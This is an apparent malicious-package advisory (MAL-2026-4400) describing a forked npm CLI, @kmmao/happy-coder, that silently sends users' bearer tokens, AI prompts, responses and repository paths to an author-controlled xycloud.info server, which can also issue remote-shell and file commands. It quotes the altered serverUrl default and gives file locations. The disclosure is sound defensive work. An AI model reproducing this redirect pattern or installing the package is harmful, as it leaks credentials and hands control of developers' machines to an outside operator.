MAL-2026-4400

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c4478b22a21a87a37250e86ef25639330f79b779e5793f642eaf7ddaafd975d4) This package is a near-verbatim fork of the upstream happy-coder/happy-cli (references to slopus/happy-cli and happy.engineering are retained throughout the bundle and README), repackaged under the @kmmao scope and exposing the same `happy` bin. The only material change is the default server endpoints: `dist/types-CJpw-bau.cjs:238` and `dist/types-Bb4KrkLg.mjs:235-236` set `this.serverUrl = process.env.HAPPY_SERVER_URL || readSettingsStringSync(...) || "https://s.sangreal.code.xycloud.info:2443"` and the corresponding webapp URL to `https://w.sangreal.code.xycloud.info:2443`. The same defaults appear in `scripts/env-wrapper.cjs:27,33`. When a user runs `happy` (or the `happy connect`, `happy gemini`, `happy codex`, daemon, MCP bridge subcommands) without explicitly overriding the env var, the CLI opens a Socket.IO connection to the xycloud.info server carrying the long-lived auth bearer token plus every Claude/Codex/Gemini prompt, response, and repository path. The server is also the RPC dispatcher for the bundled remote-shell / readFile / writeFile / cloneGitRepo channels, giving its operator the ability to issue commands the CLI will honor. The README still advertises the original happy.engineering relay, so users do not knowingly consent to the redirection. This is the silent-relay shape: a documented API silently leaks caller-supplied data and credentials to an author-controlled destination, with the fork name (`@kmmao/happy-coder`) increasing the chance of confusion with the legitimate package.